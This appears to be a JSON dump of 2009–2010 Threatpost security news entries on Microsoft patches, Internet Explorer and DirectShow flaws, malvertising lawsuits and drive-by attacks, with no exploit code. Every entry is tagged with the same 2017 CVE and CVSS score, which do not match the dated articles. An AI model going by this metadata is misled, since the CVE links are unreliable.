[The H Security]\n", "cvss3": {}, "published": "2010-01-18T17:21:33", "type": "threatpost", "title": "Botnets Hit Perl Testers With Denial of Service Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:07", "id": "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "href": "https://threatpost.com/botnets-hit-perl-testers-denial-service-attack-011810/73382/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "[](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker disk-encryption technology as \u201crelatively low risk,\u201d noting that attackers must not only have physical access to a targeted PC, but must manipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld]\n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. 
Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. 
Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:10", "description": "Microsoft today denied that it has built a backdoor into Windows 7, a concern that surfaced yesterday after a senior National Security Agency (NSA) official testified before Congress that the agency had worked on the operating system. \u201cMicrosoft has not and will not put \u2018backdoors\u2019 into Windows,\u201d a company spokeswoman said. [Read the full article](<http://www.computerworld.com/s/article/9141182/Microsoft_denies_it_built_backdoor_in_Windows_7>). 
[Computerworld]\n", "cvss3": {}, "published": "2009-11-19T21:17:20", "type": "threatpost", "title": "MS Denies Windows 7 Backdoor Allegations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:06:04", "id": "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "href": "https://threatpost.com/ms-denies-windows-7-backdoor-allegations-111909/73142/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. 
\u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. 
\u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:22", "description": "After releasing its largest-ever group of security[](<https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/>) patches two weeks ago, Microsoft has done a little cleaning up.\n\nOver the past few days, the company has re-released two security updates and issued a workaround for a Windows CryptoAPI patch that caused Microsoft\u2019s own instant-messaging server to crash. 
[Read the full story](<http://www.computerworld.com/s/article/9140139/Microsoft_cleans_up_bugs_after_biggest_patch_release?source=rss_security>) [IDG News Service/Robert McMillan]\n", "cvss3": {}, "published": "2009-10-30T13:53:35", "type": "threatpost", "title": "Microsoft Cleans Up Bugs After Biggest Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:19:07", "id": "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "href": "https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/72929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:29", "description": "Computerworld\u2019s Gregg Keizer brings word that this week\u2019s record-setting [batch of patches](<https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/>) from Microsoft actually closed the book on the vexing ATL code library issues that first surfaced in July 2009.\n\nKeizer quotes Ryan Smith, one of the hackers credited with discovering the flaw, as saying that the latest Microsoft Office updates shut the door on the last big attack vector for the ATL vulnerability. 
[Read the full story](<http://www.computerworld.com/s/article/9139371/Microsoft_patches_last_major_ATL_bugs?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-10-15T14:09:39", "type": "threatpost", "title": "Microsoft Finally Shuts Door on ATL Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:41", "id": "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "href": "https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/72329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "description": "Less than a week after [a malicious advertising attack against the New York Times](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>) ad servers, Microsoft filed five civil lawsuits against companies allegedly using online advertising to serve malware.\n\nThe lawsuits allege that individuals using the business names \u201cSoft Solutions,\u201d \u201cDirect Ad,\u201d \u201cqiweroqw.com,\u201d \u201cITmeter INC.\u201d and \u201cote2008.info\u201d used malvertisements to distribute malicious software or present deceptive websites that peddled scareware to unsuspecting Internet users.\n\n\u201cAlthough we don\u2019t yet know the names of the specific individuals behind these acts, we are filing these cases to help uncover the people responsible and prevent them from continuing their exploits,\u201d [said Tim Cranton](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>), associate general counsel at Microsoft.\n\nOur filings in King County Superior Court in Seattle outline how we believe the defendants operated, but in general, malvertising works by camouflaging malicious code as harmless online advertisements. These ads then lead to harmful or deceptive content. 
For example, ads may redirect users to a website that advertises rogue security software, also known as scareware, that falsely claims to detect or prevent threats on the computer. Malvertising may also directly infect a victim\u2019s computer with malicious software like Trojans \u2013 programs that can damage data, steal personal information or even bring the users\u2019 computer under the control of a remote operator.\n\nHere are the copies of Microsoft\u2019s court filings:\n\n * Microsoft Corp. and Microsoft Online Inc. v. John Does 1-20, d/b/a DirectAd Solutions: King Co. Superior Court Cause [No. 09-2-34024-2 SEA](<http://microsoftontheissues.com/cs/files/folders/32725/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a Soft Solutions, Inc. King Co. Superior Court Cause [No. 09-2-34021-8 SEA](<http://microsoftontheissues.com/cs/files/folders/32719/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a qiweroqw.com: King Co. Superior Court Cause [No. 09-2-34020-0 SEA](<http://microsoftontheissues.com/cs/files/folders/32722/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ote2008.info: King Co. Superior Court Cause [No. 09-2-34022-6 SEA](<http://microsoftontheissues.com/cs/files/folders/32720/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ITmeter Inc. : King Co. Superior Court Cause [No. 
09-2-34023-4 SEA](<http://microsoftontheissues.com/cs/files/folders/32724/download.aspx>)\n", "cvss3": {}, "published": "2009-09-23T22:40:03", "type": "threatpost", "title": "Microsoft Takes Aim at Malvertising Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "href": "https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/72218/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "description": "****[](<https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/>)Dennis Fisher talks with Stephen Toulouse, director of policy and enforcement for Xbox Live at Microsoft, about his years at the Microsoft Security Response Center, the evolution of security at Microsoft and the joy and pain of being the bad guy on Xbox Live.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_301.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-09-10T19:45:50", "type": "threatpost", "title": "Stephen Toulouse on the MSRC, the Evolution of Security at Microsoft and Securing Xbox Live", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "href": "https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/73017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include 
fixes for multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action, so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. 
[Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. 
[Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. 
[Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "\n\nMicrosoft released six security bulletins today \u2014 three rated Critical and three rated Important. Two of the issues are being actively exploited on the Internet and four of the issues are client-side vulnerabilities, which means the exploit can only occur if a user visits an evil website or opens a malformed document.\n\nToday\u2019s release is important because patches were released for two recent 0-day attacks \u2013 a QuickTime file parsing vulnerability and the recently announced Directshow vulnerability. Both vulnerabilities are reported as being actively exploited on the Internet.\n\nWhile Microsoft has announced workarounds and/or provided Fixit tools for each of these issues, today\u2019s patches will be welcomed by network administrators who have been tasked with remediating these issues. I recommend that network administrators download and install the patches for these two bulletins as soon as possible (MS09-032 and MS09-028)\n\nTwo of Microsoft\u2019s other releases this month apply to products that you don\u2019t see patched very often \u2013 ISA Server 2006 and Virtual PC. 
Although these two products are associated with security functions, neither flaw is as bad as it seems and Microsoft has rated the severity for each of these as Important.\n\nOf the two remaining bulletins, one applies to Publisher (Important) and one applies to the Operating System (Critical). Neither of these issues was publicly known prior to release, though I recommend reviewing and installing each of these patches as appropriate on your networks. The Operating System patch (MS09-029) is particularly nasty and can execute when a user views an evil web page, email, or Office document.\n\nI recommend installing MS09-028, 29, and 32 patches first (DirectShow, OS Font patch, and Video Control). These are the three Critical patches \u2013 which goes to show that Microsoft got the Severity ratings spot-on this month.\n\n**Details for MS09-032 and MS09-028:**\n\nMS09-032 is the bulletin for the QuickTime file parsing vulnerability. Clicking on an evil hyperlink or even hovering your mouse over a malformed QuickTime file could allow the attacker to execute code on your system. The attacker\u2019s code would have the same level of permission to your computer as the person who is logged on to the computer. If you\u2019re logged on as admin, the exploit could add or remove users and administrators from your machine, delete files, reformat your hard drive, or embed trojans or worms that could be used in future attacks.\n\nIt\u2019s important to note for this issue that the presence or absence of Adobe QuickTime is not relevant to whether or not your computer is vulnerable to this issue. The flaw resides in the Microsoft components that parse QuickTime files \u2013 so don\u2019t believe that you\u2019re safe just because you don\u2019t have QuickTime installed. 
Also, the recent QuickTime patch from Adobe (7.6.2) is not related to this issue.\n\nMS09-032 is rated as Critical for all Operating Systems.\n\nMS09-028 is the bulletin for the recently announced Microsoft DirectShow vulnerability. Viewing a malformed media file from a Windows XP or Windows Server 2003 system can enable the attacker to execute code on your system. Similar to MS09-032, the evil code will run in the context of the currently logged on user and can take any action on that system that the logged on user can take.\n\nMicrosoft released a FixIt tool that sets the browser killbits for this vulnerable section of code. The MS09-032 patch is a cumulative killbit patch that includes the killbits from the FixIt tool as well as all previously released ActiveX killbits. Users who installed the ActiveX cumulative patch from June 2009 and also ran the FixIt tool for the DirectShow have already implemented the complete set of killbits represented by the MS09-028 patch. If you ran the FixIt tool or otherwise implemented the Microsoft suggested workaround you are safe \u2013 there\u2019s no need to revert changes that you made.\n\nWhile the public exploit only impacts XP and 2003 systems, Microsoft recommends installing this patch on all Operating Systems as it includes killbits for all previously known bad ActiveX controls.\n\nDetails for the remaining four:\n\n**MS09-029** applies to all Operating Systems and could be a particularly nasty issue if left unpatched. The flaw resides in the way that Microsoft parses embedded fonts on web pages, emails, and Office documents. (in this case, embedded opentype fonts. EOT fonts ensure that everyone viewing the text sees it formatted the same way.) Viewing an evil web page, email, or Office doc could allow the attacker to execute code on your system. 
Workarounds are available, but it requires two separate changes to be made \u2013 one to protect from web content and the other to protect from evil emails and documents.\n\n**MS09-030** is a vulnerability in Microsoft Publisher documents. Viewing a malformed document could allow the attacker to run code on your system. This seems like the hundredth vulnerability in Publisher this year, and the millionth \u2018open an evil document and get hacked\u2019 vulnerability in the past two years.\n\n**MS09-031** discusses an issue with ISA Server 2006. If the ISA Server is specifically configured to use Radius one-time-passwords AND to use Kerberos for authentication AND to fallback to basic http authentication when asked, the attacker may be able to access servers protected by the firewall if they know the username of those target systems. It sounds scary, but it\u2019s probably a very small number of systems in the world that are configured exactly this way. An edge case at best. If you have an ISA Server 2006 and you\u2019re concerned that you might meet all three criteria above, it\u2019s best to patch your system. \n** \nMS09-033** relates to Guest Operating Systems that are hosted on Microsoft Virtual PC or Virtual Server. These virtualized systems are subject to a privilege escalation attack. (Non-virtualized systems are not vulnerable.) Users who can execute code on the virtual systems can run an exploit and become administrator on the virtual images. At no time can this flaw lead to compromise of the underlying Virtual PC or Virtual Server. 
IOW, it\u2019s not the much-hyped but yet-to-be-seen exploit that crosses the virtualization barrier.\n\n_* Eric Schultze is chief technology officer at Shavlik Technologies, a vulnerability management company._\n", "cvss3": {}, "published": "2009-07-14T19:02:19", "type": "threatpost", "title": "Inside Microsoft's July Security Patch Batch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T16:20:54", "id": "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "href": "https://threatpost.com/inside-microsofts-july-security-patch-batch-071409/72909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:53", "description": "[](<https://threatpost.com/updated-mass-attacks-exploiting-0-day-microsoft-video-dll-070609/>)\n\nThere is a widespread attack underway against an unpatched vulnerability in the Msvidctl DLL, with attackers using thousands of newly compromised Web sites to exploit victims\u2019 PCs via drive-by downloads. The attacks are using Internet Explorer as the attack vector and are pushing a Trojan downloader onto compromised machines.\n\nThe attacks are using injected iFrames and redirecting users to the compromised sites, many of which appear to be in China, experts say. The vulnerability the attacks are exploiting is not the zero-day flaw in Microsoft\u2019s DirectShow component, as was previously reported. Instead, the attacks are going after an undisclosed bug in Msvidctl.dll, a DLL that\u2019s associated with streaming video content on the Web.\n\nOnce a machine is compromised, the attackers are pushing a Trojan downloader program to the victims\u2019 PCs. The malware that is being pushed is already detected by many antimalware programs. 
The SANS Internet Storm Center recommends setting the killbit on the vulnerable DLL to protect against the attack.\n\nMicrosoft has set up a page with information on how to work around the vulnerability and FixIt tool to [set the killbit automatically](<http://support.microsoft.com/kb/972890>), preventing exploitation of the flaw.\n\nMicrosoft also has released an [advisory on the Msvidctl.dll vulnerability](<http://www.microsoft.com/technet/security/advisory/972890.mspx>) and said it is investigating the issue. The company said users of Windows XP and Windows 2003 should disable the affected ActiveX control. From the advisory:\n\nOur investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer using all the Class Identifiers listed in the **Workaround** section. Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure.\n\nCustomers may prevent the Microsoft Video ActiveX Control from running in Internet Explorer, either manually using the instructions in the **Workaround** section or automatically using the solution found in [Microsoft Knowledge Base Article 972890](<http://support.microsoft.com/kb/972890>). By preventing the Microsoft Video ActiveX Control from running in Internet Explorer, there is no impact to application compatibility.\n\nThe attacks against the Msvidctl.dll are following in the footsteps of the attackers who have been using SQL injection to compromise thousands of legitimate sites for the last year or so. 
The specific attack vector is different, but the idea is the same: compromise a large number of sites, attract vulnerable users and install your malware.\n\nThis has proven to be a very lucrative and effective attack method of late, and has been used to push all sorts of malware. Attackers can install keyloggers, Trojans or whatever other programs they choose once they\u2019ve exploited a given PC. That much hasn\u2019t changed. What has is the variety of vectors that attackers have at their disposal for these attacks. The number of sites that are vulnerable to SQL injection is incalculable, and many sites that are cleaned once are reinfected over and over, researchers say.\n\nThe SANS Internet Storm Center also has put together a running [list of all of the domains that currently are exploiting the vulnerability](<http://isc.sans.org/diary.html?storyid=6739&rss>). The list contains a few dozen domains right now, and there also is a separate list of domains that are pushing the binary to compromised machines.\n\n \n[](<http://go.microsoft.com/?linkid=9672398>)[Click Here To Kill-Bit MSVidCtl](<http://go.microsoft.com/?linkid=9672398> \"Click Here To Kill-Bit MSVidCtl\" )\n", "cvss3": {}, "published": "2009-07-06T14:55:43", "type": "threatpost", "title": "UPDATED: Mass Attacks Exploiting 0-Day in Microsoft Video DLL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:01", "id": "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "href": "https://threatpost.com/updated-mass-attacks-exploiting-0-day-microsoft-video-dll-070609/72820/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "This video features Tim Rains and Vinny Gullotto of Microsoft discussing the major threats from the second half of 2008.\n", "cvss3": {}, "published": "2009-06-22T10:33:11", "type": "threatpost", "title": "Microsoft Security Intelligence 
Report: The Vinny and Tim Show", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "href": "https://threatpost.com/microsoft-security-intelligence-report-vinny-and-tim-show-062209/72853/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. 
Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. 
